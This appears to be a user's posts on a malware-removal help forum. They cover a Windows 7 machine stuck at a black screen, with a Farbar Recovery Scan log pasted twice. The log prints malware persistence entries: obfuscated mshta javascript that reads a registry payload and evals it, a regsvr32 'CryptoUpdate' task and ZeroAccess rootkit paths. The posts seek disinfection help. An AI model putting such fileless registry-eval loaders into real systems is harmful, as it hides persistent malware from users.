amyr

That worked great and everything is running great. Thank you so very, very much!!!!

I will do that now.

I did. I used the avg remover tool and then used a link they sent and it still got to 96% and stopped and said error. Am I okay with what's on there or should I try again?

Everything was fine except AVG would not install. I uninstalled it, reinstalled it and it would give me an error message every time. So I went ahead and put the other programs on there - the Malware anti-malware, anti-exploit, unchecky, and mcshield.

It seems to be working fine. Do I need to add any kind of special virus protection? Do you think all of the virus' are gone now?

I was able to remove those programs with no issues. I have attached the fixlog Fixlog.txt

I turned off the virus protection that it had on and now it will open. I have attached the scan. I can't believe I didn't think to do that earlier. FRST.txt Addition.txt

I went ahead and attached the log from where I opened it in Safe Mode. It won't do it in normal mode though. FRST.txt

It will work if I open it in Safe Mode though... do you want that log?

It will not open it. I downloaded it again and the same thing happens. An icon appears at the bottom of the monitor and if I click on it the message pops up "scripts paused" and under that it says exit. Even if I open it from the flashdrive it does the same thing.

I restarted it and opened some things and shut it down and I did not get that message about windows this time. Fixlog.txt

I have attached the log for the scan I ran this morning. I ended up just running it in recovery mode and using the command prompt and doing it because I couldn't ever get it to work any other way. FRST.txt

Sorry I haven't responded. We work Tuesday - Saturday so I won't be able to work on it again until tomorrow. I will try again then.

I downloaded the tool to my desktop but when i double click it nothing happens. An icon shows up on the taskbar at the botttom, but I can't get it to open. What am i doing wrong? I attached a picture of it.

Sorry to keep bothering you, but everything looks okay except when I try to shut down the computer I get a message about forcing QBW32.EXE to close. I didn't know if that was something I should be worried about or not. I attached a picture of the message. Sorry, just paranoid now that there is something still lurking around the machine.

You still there? I just wondered if everything was okay now or should I do something else?

I have to leave work for today, but I will check back in the morning. Thanks for your help.

Yes, it came up like normal. Does that mean everything is ok?

Thanks. I have attached the log. Fixlog.txt

My Windows 7 OS has just a black screen with the cursor in the middle. I have tried to launch it in safe mode and everything else that all the other forums suggested but nothing is working. I found another topic on this site that had information that was for that specific computer so now that I have downloaded the Farbar tool and scanned the infected computer I don't know what the next step is... If anyone could offer some help it would be greatly appreciated. If I am not going about this the right way then I apologize. Here are the results of the Farbar scan: Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-09-2015 01 Ran by SYSTEM on MININT-ITIPCP2 (11-09-2015 13:56:44) Running from F:\ Platform: Windows 7 Home Premium (X64) Language: English (United States) Internet Explorer Version 9 Boot Mode: Recovery Default: ControlSet003 ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log. Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/ ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM-x32\...\Run: [**246c6654<*>] => mshta javascript:cVyqLD8C="jHu";m1w=new%20ActiveXObject("WScript.Shell");Fko57OhUa="6HIAubL9";GvG7H0=m1w.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");gWw3DEE6A="8P";eval(GvG7H0);dqi3qj (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM-x32\...\runonceex: [] => [X] Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist\514\G2AWinLogon_x64.dll [X] Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKLM\...\Policies\Explorer\Run: [**54c488f2<*>] => mshta javascript:Cmg9jOg1L="aRy";Jv59=new%20ActiveXObject("WScript.Shell");VXHzZ7iNp="70";Y5FOj6=Jv59.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");U7GKiyKah="tTM";eval(Y5FOj6);TMpv1GcW (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\WTs Guns\...\Run: [**246c6654<*>] => mshta javascript:S94NqkIF="XzZ";NS30=new%20ActiveXObject("WScript.Shell");us6ac2cD="qu8dA";inUD1=NS30.RegRead("HKCU\\software\\24f0a094b5\\5abff29d");RxBDrj63b="FnsGPu2";eval(inUD1);vmqshgn8k8="wv6dzj (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\WTs Guns\...\RunOnce: [*0d4fdb] => C:\b0d4fdb4\b0d4fdb4.exe [355840 2015-08-31] (MUKPOCOT) HKU\WTs Guns\...\RunOnce: [*0d4fdb4] => C:\Users\WTs Guns\AppData\Roaming\b0d4fdb4.exe HKU\WTs Guns\...\RunOnce: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\WTs Guns\AppData\Roaming\Microsoft\Crypto\RSA\cert_v65552_0.tpl" AppInit_DLLs: C:\PROGRA~2\WI3C8A~1\Datamngr\x64\datamngr.dll => No File AppInit_DLLs: C:\PROGRA~2\WI3C8A~1\Datamngr\x64\IEBHO.dll => No File Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06] ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation) Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06] ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation) Startup: C:\Users\QBDataServiceUser18\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-04-30] ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation) Startup: C:\Users\QBDataServiceUser20\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-05-27] ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation) Startup: C:\Users\QBDataServiceUser24\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2014-03-07] ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation) BootExecute: autocheck autochk * C:\PROGRA~2\AVG\AVG2012\avgrsa.exe /sync /restart ==================== Services (Whitelisted) ======================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S4 AdobeActiveFileMonitor11.0; C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated) S4 avgwd; C:\Program Files (x86)\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.) S2 googleupdate; C:\Windows\bswiWxhdyvnHhyL.exe [512000 2015-05-20] () S4 QuickBooksDB18; C:\Program Files (x86)\Intuit\QuickBooks 2008\QBDBMgrN.exe [128536 2006-09-13] (iAnywhere Solutions, Inc.) S3 QuickBooksDB20; C:\Program Files (x86)\Intuit\QuickBooks 2010\QBDBMgrN.exe [678912 2009-08-17] (Intuit, Inc.) S3 QuickBooksDB24; C:\Program Files (x86)\Intuit\QuickBooks 2014\QBDBMgrN.exe [679936 2013-12-02] (Intuit, Inc.) S4 vToolbarUpdater18.0.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.0.0\ToolbarUpdater.exe [1759768 2014-03-02] (AVG Secure Search) S2 PccNTUpd; "C:\Program Files (x86)\Trend Micro\OfficeScan Client\PccNTUpd.exe" -service [X] ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [28480 2012-04-19] (AVG Technologies CZ, s.r.o. ) S1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [307040 2012-11-08] (AVG Technologies CZ, s.r.o.) S1 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [47696 2011-12-23] (AVG Technologies CZ, s.r.o.) S0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [36944 2012-01-31] (AVG Technologies CZ, s.r.o.) S1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-03-02] (AVG Technologies) S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation) S0 Lbd; C:\Windows\System32\DRIVERS\Lbd.sys [69376 2012-07-24] (Lavasoft AB) S0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-09] (Corel Corporation) S3 Lavasoft Kernexplorer; \??\C:\Program Files (x86)\Lavasoft\Ad-Aware\KernExplorer64.sys [X] S1 SBRE; \??\C:\Windows\system32\drivers\SBREdrv.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2015-09-11 13:56 - 2015-09-11 13:56 - 00000000 ____D C:\FRST 2015-09-06 06:33 - 2015-09-06 06:33 - 00000000 ____D C:\ProgramData\YojaWifo 2015-09-06 06:32 - 2015-09-06 06:34 - 00000157 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.dat 2015-09-06 06:32 - 2015-09-06 06:32 - 00358400 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.exe 2015-09-01 12:59 - 2015-09-07 13:29 - 00000504 ____H C:\Windows\Tasks\35eff4f8f3fd23f10907f307.job 2015-09-01 12:59 - 2015-09-07 11:14 - 00000382 ____H C:\Windows\Tasks\CryptoUpdate.job 2015-09-01 12:59 - 2015-09-07 10:44 - 00002962 _____ C:\Windows\System32\Tasks\CryptoUpdate 2015-09-01 12:59 - 2015-09-01 12:59 - 00003084 _____ C:\Windows\System32\Tasks\35eff4f8f3fd23f10907f307 2015-08-31 11:49 - 2015-08-31 11:49 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Google 2015-08-31 05:23 - 2015-08-31 05:23 - 00000000 ___HD C:\b0d4fdb4 2015-08-31 04:26 - 2015-08-31 04:26 - 00004096 _____ C:\ProgramData\hTew6txG06C4.dll 2015-08-31 04:24 - 2015-08-31 04:24 - 00004096 _____ C:\ProgramData\p2hbAwRM06C4.dll 2015-08-29 06:23 - 2015-08-29 06:24 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8} 2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Upvhmedia 2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Okrics 2015-08-18 05:14 - 2015-08-28 04:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2015-09-11 09:23 - 2012-07-24 08:48 - 00026142 _____ C:\Windows\setupact.log 2015-09-11 09:23 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2015-09-11 08:50 - 2009-07-13 21:13 - 00797996 _____ C:\Windows\System32\PerfStringBackup.INI 2015-09-11 08:19 - 2012-07-24 07:45 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2015-09-09 09:57 - 2012-07-24 08:49 - 00089564 _____ C:\Windows\WindowsUpdate.log 2015-09-09 09:43 - 2010-10-05 07:08 - 00000000 ____D C:\Windows\pss 2015-09-02 09:30 - 2013-06-25 10:30 - 00079360 ___SH C:\Users\WTs Guns\Downloads\Thumbs.db 2015-09-02 09:30 - 2012-10-03 08:53 - 00000000 ____D C:\Users\WTs Guns\Desktop\shop Pics 2015-08-28 04:47 - 2012-07-24 08:48 - 00279972 _____ C:\Windows\PFRO.log 2015-08-28 04:47 - 2012-05-03 04:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2015-08-28 04:34 - 2012-07-24 07:45 - 00778440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2015-08-28 04:34 - 2012-07-24 07:45 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2015-08-28 04:34 - 2011-05-24 12:43 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2015-08-19 12:48 - 2013-11-01 07:28 - 00002426 _____ C:\Users\WTs Guns\Desktop\IMS V6.lnk 2015-08-12 10:10 - 2013-04-09 10:33 - 00122368 ___SH C:\Users\WTs Guns\Desktop\Thumbs.db ZeroAccess: C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a} C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000000.@ C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000032.@ C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000064.@ C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\00000004.@ C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\1afb2d56 C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\201d3dde ZeroAccess: C:\Users\WTs Guns\AppData\Local\{21d795b1-cb65-1fe9-782f-dd55be9fe90a} Files to move or delete: ==================== C:\ProgramData\hTew6txG06C4.dll C:\ProgramData\p2hbAwRM06C4.dll C:\Users\WTs Guns\aaaaaaaa.exe Some files in TEMP: ==================== C:\Users\WTs Guns\AppData\Local\Temp\3fffb56d-6b40-4cd3-b5fb-0ac36bf72961.exe C:\Users\WTs Guns\AppData\Local\Temp\6013073.exe C:\Users\WTs Guns\AppData\Local\Temp\76FA.tmp.exe C:\Users\WTs Guns\AppData\Local\Temp\Abspdf.exe C:\Users\WTs Guns\AppData\Local\Temp\acfpdfu.dll C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuamd64.dll C:\Users\WTs Guns\AppData\Local\Temp\acfpdfui.dll C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuia64.dll C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiamd64.dll C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiia64.dll C:\Users\WTs Guns\AppData\Local\Temp\ApnStub.exe C:\Users\WTs Guns\AppData\Local\Temp\avguidx.dll C:\Users\WTs Guns\AppData\Local\Temp\C07A.tmp.exe C:\Users\WTs Guns\AppData\Local\Temp\cdintf.dll C:\Users\WTs Guns\AppData\Local\Temp\CommonInstaller.exe C:\Users\WTs Guns\AppData\Local\Temp\csrsss.exe C:\Users\WTs Guns\AppData\Local\Temp\docviewe.exe C:\Users\WTs Guns\AppData\Local\Temp\install_flash_player_18_active_x.exe C:\Users\WTs Guns\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe C:\Users\WTs Guns\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe C:\Users\WTs Guns\AppData\Local\Temp\jre-6u39-windows-i586-iftw.exe C:\Users\WTs Guns\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe C:\Users\WTs Guns\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exe C:\Users\WTs Guns\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe C:\Users\WTs Guns\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe C:\Users\WTs Guns\AppData\Local\Temp\MachineIdCreator.exe C:\Users\WTs Guns\AppData\Local\Temp\oi_{2D24F029-B2B5-4807-A2F5-C3CDF78AE31D}.exe C:\Users\WTs Guns\AppData\Local\Temp\PDFPRT400.exe C:\Users\WTs Guns\AppData\Local\Temp\readSTILog.dll C:\Users\WTs Guns\AppData\Local\Temp\ToolbarInstaller.exe C:\Users\WTs Guns\AppData\Local\Temp\UNINSTALL.EXE C:\Users\WTs Guns\AppData\Local\Temp\xmllite.dll ==================== Known DLLs (Whitelisted) ========================= ==================== Bamital & volsnap ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => MD5 is legit C:\Windows\System32\wininit.exe => MD5 is legit C:\Windows\SysWOW64\wininit.exe => MD5 is legit C:\Windows\explorer.exe => MD5 is legit C:\Windows\SysWOW64\explorer.exe => MD5 is legit C:\Windows\System32\svchost.exe => MD5 is legit C:\Windows\SysWOW64\svchost.exe => MD5 is legit C:\Windows\System32\services.exe => MD5 is legit C:\Windows\System32\User32.dll => MD5 is legit C:\Windows\SysWOW64\User32.dll => MD5 is legit C:\Windows\System32\userinit.exe => MD5 is legit C:\Windows\SysWOW64\userinit.exe => MD5 is legit C:\Windows\System32\rpcss.dll => MD5 is legit C:\Windows\System32\dnsapi.dll => MD5 is legit C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit ==================== Restore Points ========================= ==================== Memory info =========================== Percentage of memory in use: 11% Total physical RAM: 6108.98 MB Available physical RAM: 5384.06 MB Total Virtual: 6107.13 MB Available Virtual: 5387.99 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:683.95 GB) (Free:469.29 GB) NTFS Drive f: (USB20FD) (Removable) (Total:7.51 GB) (Free:7.5 GB) FAT32 Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS Drive y: (RECOVERY) (Fixed) (Total:14.65 GB) (Free:9.24 GB) NTFS ==>[system with boot components (obtained from reading drive)] ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 698.6 GB) (Disk ID: 78033E78) Partition 1: (Not Active) - (Size=39 MB) - (Type=DE) Partition 2: (Active) - (Size=14.6 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=683.9 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (Size: 7.5 GB) (Disk ID: 04DD5721) Partition 1: (Active) - (Size=7.5 GB) - (Type=0C) LastRegBack: 2015-09-11 08:32 ==================== End of FRST.txt ============================

My Windows 7 OS has just a black screen with the cursor in the middle. I have tried to launch it in safe mode and everything else that all the other forums suggested but nothing is working. I found another topic on this site that had information that was for that specific computer so now that I have downloaded the Farbar tool and scanned the infected computer I don't know what the next step is... If anyone could offer some help it would be greatly appreciated. If I am not going about this the right way then I apologize, but I really don't know what else to do. Here are the results of the Farbar scan: Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-09-2015 01Ran by SYSTEM on MININT-ITIPCP2 (11-09-2015 13:56:44)Running from F:\Platform: Windows 7 Home Premium (X64) Language: English (United States)Internet Explorer Version 9Boot Mode: RecoveryDefault: ControlSet003ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log. Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM-x32\...\Run: [**246c6654<*>] => mshta javascript:cVyqLD8C="jHu";m1w=new%20ActiveXObject("WScript.Shell");Fko57OhUa="6HIAubL9";GvG7H0=m1w.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");gWw3DEE6A="8P";eval(GvG7H0);dqi3qj (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters)HKLM-x32\...\runonceex: [] => [X]Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist\514\G2AWinLogon_x64.dll [X]Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)HKLM\...\Policies\Explorer\Run: [**54c488f2<*>] => mshta javascript:Cmg9jOg1L="aRy";Jv59=new%20ActiveXObject("WScript.Shell");VXHzZ7iNp="70";Y5FOj6=Jv59.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");U7GKiyKah="tTM";eval(Y5FOj6);TMpv1GcW (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters)HKU\WTs Guns\...\Run: [**246c6654<*>] => mshta javascript:S94NqkIF="XzZ";NS30=new%20ActiveXObject("WScript.Shell");us6ac2cD="qu8dA";inUD1=NS30.RegRead("HKCU\\software\\24f0a094b5\\5abff29d");RxBDrj63b="FnsGPu2";eval(inUD1);vmqshgn8k8="wv6dzj (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)HKU\WTs Guns\...\RunOnce: [*0d4fdb] => C:\b0d4fdb4\b0d4fdb4.exe [355840 2015-08-31] (MUKPOCOT)HKU\WTs Guns\...\RunOnce: [*0d4fdb4] => C:\Users\WTs Guns\AppData\Roaming\b0d4fdb4.exeHKU\WTs Guns\...\RunOnce: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\WTs Guns\AppData\Roaming\Microsoft\Crypto\RSA\cert_v65552_0.tpl"AppInit_DLLs: C:\PROGRA~2\WI3C8A~1\Datamngr\x64\datamngr.dll => No FileAppInit_DLLs: C:\PROGRA~2\WI3C8A~1\Datamngr\x64\IEBHO.dll => No FileStartup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06]ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06]ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\QBDataServiceUser18\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-04-30]ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\QBDataServiceUser20\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-05-27]ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\QBDataServiceUser24\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2014-03-07]ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)BootExecute: autocheck autochk * C:\PROGRA~2\AVG\AVG2012\avgrsa.exe /sync /restart ==================== Services (Whitelisted) ======================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S4 AdobeActiveFileMonitor11.0; C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)S4 avgwd; C:\Program Files (x86)\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.)S2 googleupdate; C:\Windows\bswiWxhdyvnHhyL.exe [512000 2015-05-20] ()S4 QuickBooksDB18; C:\Program Files (x86)\Intuit\QuickBooks 2008\QBDBMgrN.exe [128536 2006-09-13] (iAnywhere Solutions, Inc.)S3 QuickBooksDB20; C:\Program Files (x86)\Intuit\QuickBooks 2010\QBDBMgrN.exe [678912 2009-08-17] (Intuit, Inc.)S3 QuickBooksDB24; C:\Program Files (x86)\Intuit\QuickBooks 2014\QBDBMgrN.exe [679936 2013-12-02] (Intuit, Inc.)S4 vToolbarUpdater18.0.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.0.0\ToolbarUpdater.exe [1759768 2014-03-02] (AVG Secure Search)S2 PccNTUpd; "C:\Program Files (x86)\Trend Micro\OfficeScan Client\PccNTUpd.exe" -service [X] ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [28480 2012-04-19] (AVG Technologies CZ, s.r.o. )S1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [307040 2012-11-08] (AVG Technologies CZ, s.r.o.)S1 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [47696 2011-12-23] (AVG Technologies CZ, s.r.o.)S0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [36944 2012-01-31] (AVG Technologies CZ, s.r.o.)S1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-03-02] (AVG Technologies)S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)S0 Lbd; C:\Windows\System32\DRIVERS\Lbd.sys [69376 2012-07-24] (Lavasoft AB)S0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-09] (Corel Corporation)S3 Lavasoft Kernexplorer; \??\C:\Program Files (x86)\Lavasoft\Ad-Aware\KernExplorer64.sys [X]S1 SBRE; \??\C:\Windows\system32\drivers\SBREdrv.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2015-09-11 13:56 - 2015-09-11 13:56 - 00000000 ____D C:\FRST2015-09-06 06:33 - 2015-09-06 06:33 - 00000000 ____D C:\ProgramData\YojaWifo2015-09-06 06:32 - 2015-09-06 06:34 - 00000157 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.dat2015-09-06 06:32 - 2015-09-06 06:32 - 00358400 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.exe2015-09-01 12:59 - 2015-09-07 13:29 - 00000504 ____H C:\Windows\Tasks\35eff4f8f3fd23f10907f307.job2015-09-01 12:59 - 2015-09-07 11:14 - 00000382 ____H C:\Windows\Tasks\CryptoUpdate.job2015-09-01 12:59 - 2015-09-07 10:44 - 00002962 _____ C:\Windows\System32\Tasks\CryptoUpdate2015-09-01 12:59 - 2015-09-01 12:59 - 00003084 _____ C:\Windows\System32\Tasks\35eff4f8f3fd23f10907f3072015-08-31 11:49 - 2015-08-31 11:49 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Google2015-08-31 05:23 - 2015-08-31 05:23 - 00000000 ___HD C:\b0d4fdb42015-08-31 04:26 - 2015-08-31 04:26 - 00004096 _____ C:\ProgramData\hTew6txG06C4.dll2015-08-31 04:24 - 2015-08-31 04:24 - 00004096 _____ C:\ProgramData\p2hbAwRM06C4.dll2015-08-29 06:23 - 2015-08-29 06:24 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Upvhmedia2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Okrics2015-08-18 05:14 - 2015-08-28 04:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2015-09-11 09:23 - 2012-07-24 08:48 - 00026142 _____ C:\Windows\setupact.log2015-09-11 09:23 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT2015-09-11 08:50 - 2009-07-13 21:13 - 00797996 _____ C:\Windows\System32\PerfStringBackup.INI2015-09-11 08:19 - 2012-07-24 07:45 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job2015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A02015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A02015-09-09 09:57 - 2012-07-24 08:49 - 00089564 _____ C:\Windows\WindowsUpdate.log2015-09-09 09:43 - 2010-10-05 07:08 - 00000000 ____D C:\Windows\pss2015-09-02 09:30 - 2013-06-25 10:30 - 00079360 ___SH C:\Users\WTs Guns\Downloads\Thumbs.db2015-09-02 09:30 - 2012-10-03 08:53 - 00000000 ____D C:\Users\WTs Guns\Desktop\shop Pics2015-08-28 04:47 - 2012-07-24 08:48 - 00279972 _____ C:\Windows\PFRO.log2015-08-28 04:47 - 2012-05-03 04:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service2015-08-28 04:34 - 2012-07-24 07:45 - 00778440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe2015-08-28 04:34 - 2012-07-24 07:45 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater2015-08-28 04:34 - 2011-05-24 12:43 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl2015-08-19 12:48 - 2013-11-01 07:28 - 00002426 _____ C:\Users\WTs Guns\Desktop\IMS V6.lnk2015-08-12 10:10 - 2013-04-09 10:33 - 00122368 ___SH C:\Users\WTs Guns\Desktop\Thumbs.db 